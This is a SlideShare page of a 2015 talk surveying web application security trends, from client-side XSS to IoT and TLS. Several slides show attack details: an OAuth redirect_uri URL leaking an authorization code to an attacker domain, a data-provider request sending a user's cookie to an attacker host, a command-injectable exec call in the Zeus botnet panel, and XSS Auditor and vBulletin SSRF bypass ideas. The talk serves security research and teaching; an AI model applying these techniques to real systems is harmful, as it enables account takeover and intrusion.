SlideShare uma empresa Scribd logo

Owasp web application security trends

Transferir como PPTX, PDF
B
beched

Hot web security research areas

Software
1 de 45
Web application security trends Omar Ganiev 28/02/2015
Hi! I’m Beched, and I love hacking an solving problems. Let’s observe overall trends and some recently published papers, vulnerabilities and techniques, connected with web application security.
Classification Questions to classify the vulnerabilities: • Is the exploitation technique new or known? • Is the attack target new or known technology? • How large is a potential attack surface?
Sourcesof news • Bug trackers, mailing lists • https://blackhat.com/html/archives.html • https://blog.whitehatsec.com/top-10-web- hacking-techniques-2013/ • https://blog.whitehatsec.com/top-10-web- hacking-techniques-of-2014/ • …
Community opinion • 30.77% of respondents from rdot.org will go to dance a ballet, because web hacking is gonna become way too complex =)
Obvious remarks • Growth of security awareness of developers makes their code more secure • At the same time new products and technologies are often released without careful security audit • Old software is often considered as safe and trusty but contains severe vulnerabilities • Business logic bugs are alive
Obvious remarks • Infosec is part of CS and IT, and it inherits global trends • The global trend is a wide spread of various gadgets and mobile devices • The global trend is making houses and vehicles smart • The global trend is making web interfaces rich and self-contained in the browsers
Take a look • There’re loads of papers and presentations at BlackHat archives. If we filter those, which are connected with web security, and range the topics, we get the following scoreboard of trends: • client-side && mobile • clouds && big data && social networks • misc && classic • TLS && SSL • IoT && routers • PRNG && SSRF && etc • old soft
Client-side && Mobile • Known technologies, new life • There’re loads of papers on client-side security • Loads of bug bounties are given for XSS or something like that • There’re a lot of tricky techniques, and we can see a long war between browser developers and XSS hunters • Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases impact of XSS
Client-side && Mobile DISSECTING CSRF ATTACKS & COUNTERMEASURES JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME MILLION BROWSER BOTNET PIXEL PERFECT TIMING ATTACKS WITH HTML5 ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR REVISITING XSS SANITIZATION SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS TWO FACTOR FAILURE THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD
Client-side && Mobile • UXSS, MXSS • ChromeOS, FirefoxOS • Browser extensions hacking • Endless security features vs bypass war • XSS Auditor, CSP, HttpOnly, SOP, CORS • Funny things like RFD (reflected file download) • OAuth bugs
Example • Chrome XSS auditor breaks a lot of attacks, but in most cases it can be bypassed, or at least an attack can be modified • The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets • There’re plenty of bypasses, take a look at http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/ http://www.thespanner.co.uk/2015/02/19/another-xss-auditor- bypass/ https://www.blackhat.com/docs/us-14/materials/us-14-Johns- Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side- XSS-Filtering.pdf
Example • Other bypasses include CSRF tokens leakage, form target forgery, etc
Example • Secure CMS and XSS Auditor can be spoiled with plugins • Look at this typographic plugin for Drupal: var result = Typographus_Lite_UTF8.typo_text( $(this).text() ); $(this).after(result).remove(); • JQuery method after() is insecure. As a result, div contents become HTML-decoded, and all your reflected or stored <script> stuff becomes active
Example • OAuth is often vulnerable to open redirect due to lack of redirect_uri validation https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879 c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&sco pe=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257 After authorization redirects to: http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85 458d0db1c65792d52c8bef3c4407374b2 • Access token (code) value is enough for account takeover
Clouds && Big data && Social networks • Fairly new technologies • Cloud computing and machine learning are heavily used for different purposes • As for infosec, this can be used both for attack and defense • Social networks and big data providers can be exploited for deanonymization and fraud • Machine learning can be used for building WAF
Clouds && Big data && Social networks PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS BIG DATA FOR WEB APPLICATION SECURITY FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFIC PIVOTING IN AMAZON CLOUDS BRINGING A MACHETE TO THE AMAZON BABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALE SECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORING BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS HADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANT HOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS
Example • Post-exploitation of distributed web applications is often a bit tricky – you don’t exactly know which node will process your request • Nodes can often be enumerated via HTTP response headers or cookies • Sometimes some nodes are not updated and contain vulnerabilities • This creates mind-blowing phantom vulnerabilities =) • Take a look at cool talk about Amazon EC2 post- exploitation: https://www.blackhat.com/docs/us- 14/materials/us-14-Riancho-Pivoting-In-Amazon- Clouds.pdf
Example • Data providers are often used for targeted marketing. However, their data can sometimes be stolen and used for deanonymisation or fraud. This is documented API request: https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=htt p://incsecurity.ru/?adv_id=$UID • $UID will be replaced with actual cookie value by the server and will be sent to attacker host • Information about user can be obtained via JSONP hijacking, even if session id is checked.
Example • Request: https://*.ru/api/get/?uid=$UID&success_cb=_cb_s&fail_cb=_cb_e&st =1 • Response contains information about gender, interests, etc. Part of interests description file: … { "id": "40010082", "segment": "Fetish & Bondage", "category": "Interests", "section": "Interests", "description": "“ } …
Misc & Classic • There’re a lot of works which continue previous researches and bug reports • They improve exploitation of classical vulnerabilities like SQL injection and testing/analysis methods • The raise of penetration testing industry pushed up demand for .NET and J2EE applications hacking methods
Misc & Classic ') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES’)%00 INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA CONTEMPORARY AUTOMATIC PROGRAM ANALYSIS FINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG IMPLEMENTATIONS I KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS! SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS
Example • The paper about hacking C&C panels reminded me of the RCE vulnerability in Zeus C&C, which I published near 2010. I opened these links now: http://ahack.ru/bugs/zeus-vulnerability- exploit.htm https://github.com/Visgean/Zeus/ • Guess what I see there since 5 years? ;)
Example • The name of function has changed, but vulnerability is still there, AFAICS ... function fsarcCreate($archive, $files) ... $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); ... foreach($_POST['files'] as $file)$list[] = $_CUR_PATH.'/'.$file; ... if(!function_exists('fsarcCreate') || ($arcfile = fsarcCreate($arcfile, $list)) === false)die('Failed to create archive, please check "system/fsarc.php" script.'); ...
Example • This is a small example, probably there’re more critical vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code? • Paper on contemporary automatic program analysis mostly tells about grep =) • Personally I use grep with lovely regular expressions: w*(include|require)(_once)?[s(]+(?!s*('[^']*'|"[^"]*"| )[@s.]*(urlencode|rand|rawurlencode|basename|le venshtein|doubleval|sizeof|base64_encode|strlen|flo or|crypt|strrpos|filter_input|abs|bin2hex|bindec|has h|intval|max|decbin|strpos|crc32|ord|md5|count|sh a1|min|pathinfo|floatval|round|hexdec)s*()[^;]*$. *
Example
Example • 2014 has gone, and here comes 2015, but PHP and Apache are still broken • Several UAF vulnerabilities in PHP fixed recently, still a lot of restriction bypasses and RCE vulnerabilities live deep there • Apache has not yet learnt RFC • Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP
TLS && SSL • As old as the world • There’re still a lot of misconfiguration issues with HTTPS • Also there’re a lot of scary words like BEAST, CRIME, BREACH, HeartBleed, POODLE, SSLStrip and others • Many configuration mistakes are result of trade-off between performance and security
TLS && SSL SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME TLS 'SECRETS' TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS A PERFECT CRIME? ONLY TIME WILL TELL THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP BYPASSING HTTP STRICT TRANSPORT SECURITY
IoT && Routers • This is one of the most popular new IT trends everyone heard about • New means untested. Untested means vulnerable • Seriously, the Internet of things is broken, and many yell about it • People hack RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc
IoT && Routers EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER HOME INVASION V2.0 - ATTACKING NETWORK- CONTROLLED HARDWARE A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS
Example • Just look at this:
Example • And this:
Example • And this (admin;admin):
Example • BTW, side note: why doesn’t XSS Auditor perform HTTP response splitting check? • As you could see on the screenshot above, response splitting kills XSS Auditor, because we can inject header X-XSS-Protection: 0.
PRNG && SSRF && etc • XXE, SSRF and randomness hacking were hot topics of 2012-2013 • They are popular today too, new applications and attack vectors are developed
PRNG && SSRF && etc BLACK-BOX ASSESSMENT OF PSEUDORANDOM ALGORITHMS XML OUT-OF-BAND DATA RETRIEVAL THE NEW PAGE OF INJECTIONS BOOK: MEMCACHED INJECTIONS ICSCORSAIR: HOW I WILL PWN YOUR ERP THROUGH 4-20 MA CURRENT LOOP
Example • Autodiscover interface in OWA reveals an internal IP address of the mail server • Ev.owa interface with cPfdDC parameter can be used to send some LDAP requests and connect to different hosts (“domain controllers”) Microsoft.Exchange.Data.Directory.SuitabilityVerifie r.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential) • If there was bypass for anti-CSRF canary, you could possibly steal NTLM credentials
Example • vBulletin forum CMS allows to upload attachments from remote URL (class_upload.php, class_vurl.php) • First it checks the file size via HEAD request, then it downloads the file • You can use HTTP multiplexor to exploit race condition and return code 200 and valid file size for the first request and 302 redirect for the second request • Some configuration options and old versions of cURL allow file:// URL wrapper in Location header
Old soft • We’ve witnessed several critical vulnerabilities in well-known and widely used software in 2014 • HeartBleed, GHOST, ShellShock, POODLE, goto fail, etc • Probably it’s an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere
Old soft EPIDEMIOLOGY OF SOFTWARE VULNERABILITIES: A STUDY OF ATTACK SURFACE SPREAD SSL VALIDATION CHECKING VS. GO(ING) TO FAIL
Example • Although these famous vulnerabilities are not caused by web applications, they deeply affect them • ShellShock and GHOST affect webapp<->OS interaction layer • HeartBleed, goto fail, POODLE, affect mainly webapp<->encryption<->network interaction layer
Example • This is another proof of why shouldn’t we consider any part of the software as trusted. Each component of the system can be broken • BTW, newspapermen also started the era of nicknames for vulnerabilities • I find this a bit ridiculous but funny =)
Summary • The Internet is broken • The WWW is broken • Hackers gonna hack • Web applications become smarter • Hacking becomes smarter
Questions? beched@incsecurity.ru

Recomendados

Find maximum bugs in limited time
Find maximum bugs in limited timeFind maximum bugs in limited time
Find maximum bugs in limited timebeched
 
Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Ajay Negi
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!Soroush Dalili
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
BruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack trafficBruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack trafficAbraham Aranguren
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Silent web app testing by example - BerlinSides 2011
Silent web app testing by example - BerlinSides 2011Silent web app testing by example - BerlinSides 2011
Silent web app testing by example - BerlinSides 2011Abraham Aranguren
 

Recomendados

Find maximum bugs in limited time
Find maximum bugs in limited timeFind maximum bugs in limited time
Find maximum bugs in limited timebeched
 
Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Ajay Negi
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!Soroush Dalili
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
BruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack trafficBruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack trafficAbraham Aranguren
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Silent web app testing by example - BerlinSides 2011
Silent web app testing by example - BerlinSides 2011Silent web app testing by example - BerlinSides 2011
Silent web app testing by example - BerlinSides 2011Abraham Aranguren
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Owasp tds
Owasp tdsOwasp tds
Owasp tdssnyff
 
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Abraham Aranguren
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect XssFerruh Mavituna
 
Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsNetsparker
 
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakAbraham Aranguren
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Same-origin Policy (SOP)
Same-origin Policy (SOP)Same-origin Policy (SOP)
Same-origin Policy (SOP)Netsparker
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661snyff
 
Legal and efficient web app testing without permission
Legal and efficient web app testing without permissionLegal and efficient web app testing without permission
Legal and efficient web app testing without permissionAbraham Aranguren
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
DEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webDEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webFelipe Prado
 
Flashack
FlashackFlashack
Flashackn|u - The Open Security Community
 
Examining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS FilterExamining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS Filterkuza55
 
Augmented reality in your web proxy
Augmented reality in your web proxyAugmented reality in your web proxy
Augmented reality in your web proxyRoberto Suggi Liverani
 
Bug bounties - cén scéal?
Bug bounties - cén scéal?Bug bounties - cén scéal?
Bug bounties - cén scéal?Ciaran McNally
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivation[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivationbeched
 
Blackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложенийBlackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложенийbeched
 

Mais conteúdo relacionado

Mais procurados

Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Owasp tds
Owasp tdsOwasp tds
Owasp tdssnyff
 
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Abraham Aranguren
 
Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsNetsparker
 
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakAbraham Aranguren
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Same-origin Policy (SOP)
Same-origin Policy (SOP)Same-origin Policy (SOP)
Same-origin Policy (SOP)Netsparker
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661snyff
 
Legal and efficient web app testing without permission
Legal and efficient web app testing without permissionLegal and efficient web app testing without permission
Legal and efficient web app testing without permissionAbraham Aranguren
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
DEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webDEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webFelipe Prado
 
Examining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS FilterExamining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS Filterkuza55
 
Bug bounties - cén scéal?
Bug bounties - cén scéal?Bug bounties - cén scéal?
Bug bounties - cén scéal?Ciaran McNally
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 

Mais procurados (20)

Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to rails
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Owasp tds
Owasp tdsOwasp tds
Owasp tds
 
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
 
Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass Firewalls
 
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreak
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Same-origin Policy (SOP)
Same-origin Policy (SOP)Same-origin Policy (SOP)
Same-origin Policy (SOP)
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661
 
Legal and efficient web app testing without permission
Legal and efficient web app testing without permissionLegal and efficient web app testing without permission
Legal and efficient web app testing without permission
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
DEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webDEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot web
 
Flashack
FlashackFlashack
Flashack
 
Examining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS FilterExamining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS Filter
 
Augmented reality in your web proxy
Augmented reality in your web proxyAugmented reality in your web proxy
Augmented reality in your web proxy
 
Bug bounties - cén scéal?
Bug bounties - cén scéal?Bug bounties - cén scéal?
Bug bounties - cén scéal?
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
 

Destaque

[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivation[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivationbeched
 
Blackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложенийBlackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложенийbeched
 
Воркшоп по анализ защищённости веб-приложений
Воркшоп по анализ защищённости веб-приложенийВоркшоп по анализ защищённости веб-приложений
Воркшоп по анализ защищённости веб-приложенийbeched
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Криптология в анализе защищённости
Криптология в анализе защищённостиКриптология в анализе защищённости
Криптология в анализе защищённостиbeched
 
Data mining for nmap acceleration
Data mining for nmap accelerationData mining for nmap acceleration
Data mining for nmap accelerationbeched
 

Destaque (6)

[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivation[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivation
 
Blackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложенийBlackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложений
 
Воркшоп по анализ защищённости веб-приложений
Воркшоп по анализ защищённости веб-приложенийВоркшоп по анализ защищённости веб-приложений
Воркшоп по анализ защищённости веб-приложений
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Криптология в анализе защищённости
Криптология в анализе защищённостиКриптология в анализе защищённости
Криптология в анализе защищённости
 
Data mining for nmap acceleration
Data mining for nmap accelerationData mining for nmap acceleration
Data mining for nmap acceleration
 

Semelhante a Owasp web application security trends

Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaultsMatias Korhonen
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014Amazon Web Services
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?Ksenia Peguero
 
Play,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingPlay,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingHeba Hamdy Farahat
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityNelsan Ellis
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017Philippe Gamache
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 Philippe Gamache
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
Bank One App Sec Training
Bank One App Sec TrainingBank One App Sec Training
Bank One App Sec TrainingMike Spaulding
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers Lewis Ardern
 
Agile Network India | DevSecOps - The What and the Why | Ritesh Shregill
Agile Network India | DevSecOps - The What and the Why | Ritesh ShregillAgile Network India | DevSecOps - The What and the Why | Ritesh Shregill
Agile Network India | DevSecOps - The What and the Why | Ritesh ShregillAgileNetwork
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 

Semelhante a Owasp web application security trends (20)

